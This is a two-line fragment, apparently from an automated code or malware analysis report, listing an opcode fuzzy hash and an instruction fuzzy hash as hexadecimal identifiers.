• Opcode Fuzzy Hash: 38567bb5c1c9ff92609438c0d2d4a3a0e13204bdf698fc136a951b373fddf6d2
• Instruction Fuzzy Hash: 33E0D6B0A00108DBC729EF54D501BEEBBB2EF20304F1080ACAC0A07780CF761A0ADE82